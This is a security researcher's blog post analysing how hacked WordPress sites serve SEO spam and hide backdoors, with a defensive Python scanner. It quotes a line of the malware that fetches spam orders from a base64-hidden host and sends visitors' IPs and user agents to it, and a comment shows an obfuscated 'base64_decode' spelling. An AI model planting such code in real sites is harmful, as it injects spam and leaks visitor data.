SEO SPAM network – Code used and more details

May 27, 2010, by David Dede


Lately we have been talking a lot about WordPress sites getting hacked with SEO Spam:

1-SEO SPAM network – Details of the wp-includes infection
2-It is not over – SEO Spam on sites infected

Some big sites got infected, and the common complaint I hear is that even after they clean up the SPAM, it just “magically” reappears after a few days.

Infection and analysis

*This is important: The latest version of WordPress (2.9.2) is not vulnerable, but if you took a while to upgrade, your site might have been hacked in the past and the attackers left a backdoor behind. So you need to find where it is.

We are seeing three attack behaviors:

1-SPAM is added to all the pages. This is generally done by infecting wp-blog-header.php or the footer.php inside the theme templates.
2-SPAM is not visible on the main pages and is only added inside wp-includes.
3-Backdoors are left behind by the attackers (very common).

When SPAM is added to all the pages, it is easy to spot. If you view the source of your site, you will see lots of links at the bottom:

<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=rezeptfreie-potenzmittel<br  />medikamente rezeptfrei medikamente rezeptfrei
<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=super-kamagra-billig-kaufen;
super kamagra billig kaufen
<a href=">
super kamagra billig kaufen
<a href="http://www.bbc.th.edu/phpBB/language/lang_thai/email/request.php?p=viagra-kaufen-in-hamburg
kaufen viagra<br  />..<br  /><a href=">
kaufen viagra ..

Our scanner also detects it pretty easily.

When the SPAM is not visible, the easiest way to find it is by doing Google searches using your domain name plus SPAM keywords. We explain it in detail here.

Finding the backdoors is a bit trickier. In most of the cases we see, they are hidden in these places:

-wp-content/uploads – Search for .php files
-wp-includes/index.php or inside wp-includes/js – Search for .php files

However, they can be anywhere. My recommendation is that you download all your files to your desktop and do a mass search for “eval(base64_decode” or unusually large strings inside PHP files. Running an antivirus scan over the downloaded files will also help to find everything.

Code being used

The code being used to serve the SPAM is this one: http://sucuri.net/malware/entry/MW:SPAM:PH23 or sometimes this one (in the case of the .files directory).

We are seeing a lot of sites reading their “orders” from this domain: http://dvc44ftgr.com. It is hidden inside the code using base64 encoding:

// base64_decode("ZHZjNDRmdGdyLmNvbQ==") yields "dvc44ftgr.com"; the script builds the URL of a
// random "links" file on that host and reports the visitor's IP, host name and user agent.
$RAF63EAA7A2D15CA59ABB95B6FD1AFEBF =
    "http://" . base64_decode("ZHZjNDRmdGdyLmNvbQ==") . "/links/" . rand(0, 250) . ".txt"
    . "?ip=" . $_SERVER["REMOTE_ADDR"]
    . "&host=" . rawurlencode($_SERVER["HTTP_HOST"])
    . "&agent=" . rawurlencode($_SERVER["HTTP_USER_AGENT"]);

Plus, this domain is full of spammy sub-domains: citect-software.dvc44ftgr.com, jobs-mississauga.dvc44ftgr.com, trigonometry-calculate.dvc44ftgr.com, download-pinball.dvc44ftgr.com, etc, etc.
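A small scanner, added here as an example and not part of the original post, that automates the checks described above: it flags .php files in the locations named as backdoor hiding places, matches eval(base64_decode, decodes quoted base64 literals so a hidden domain such as dvc44ftgr.com shows up in plain text, and flags unusually long strings (the 200-character threshold is an assumed value). The PHP it is run against is a constructed sample, not a file from an infected site.

```python
import base64
import re
from pathlib import Path

# Locations the post names as the usual hiding places for backdoors (relative to the WP root).
SUSPECT_DIRS = ("wp-content/uploads", "wp-includes/js")
SUSPECT_FILES = ("wp-includes/index.php",)
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
B64_LITERAL_RE = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/=]{8,})["']\s*\)""")
LONG_STRING_RE = re.compile(r"""["'][A-Za-z0-9+/=]{200,}["']""")  # 200 chars is an assumed threshold

def scan_php_source(relpath, source):
    """Return a list of findings for one PHP file given as (POSIX path relative to WP root, text)."""
    findings = []
    if relpath in SUSPECT_FILES or any(relpath.startswith(d + "/") for d in SUSPECT_DIRS):
        findings.append("php-in-suspect-location")
    if EVAL_B64_RE.search(source):
        findings.append("eval-base64_decode")
    if LONG_STRING_RE.search(source):
        findings.append("long-encoded-string")
    # Decode every quoted base64 literal so hidden hostnames appear in plain text in the report.
    for m in B64_LITERAL_RE.finditer(source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not printable base64 text; skip rather than guess
        findings.append("decodes-to:" + decoded)
    return findings

def scan_tree(root):
    """Walk a downloaded WordPress tree and map relative path -> findings for flagged files."""
    root = Path(root)
    report = {}
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        findings = scan_php_source(rel, path.read_text(errors="replace"))
        if findings:
            report[rel] = findings
    return report

# Constructed sample (not a file from an infected site); it mirrors the two patterns the post
# describes: the base64-hidden "orders" domain and an eval(base64_decode()) loader.
SAMPLE_PHP = (
    '<?php\n'
    '$u = "http://".base64_decode("ZHZjNDRmdGdyLmNvbQ==")."/links/".rand(0,250).".txt";\n'
    'eval(base64_decode($payload));\n'
)

if __name__ == "__main__":
    print(scan_php_source("wp-content/uploads/2010/05/image.php", SAMPLE_PHP))
```

A literal match on eval(base64_decode misses obfuscated spellings of the function name, so a clean result from this check alone is not proof the site is clean; decoding the quoted literals is what surfaces the command domain.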

For the backdoors, they are using simple variations of the c99 (or the r57) PHP shells. You can see some of them in our blacklist database: f57, c99, etc.

If anyone has more information, let us know.

If your site is hacked (or infected with malware) and you need help, send us an email at contact@sucuri.net or visit our site: http://sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if they ever get infected with malware, hacked or blacklisted.


About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Bourgy

    May 30, 2010

    These guys are becoming more and more sophisticated it seems

  2. guaka

    June 14, 2010

    I've seen some code like $y = 'base'.'6';$y.= '4_d'.'ecode'; – making it way harder to detect.
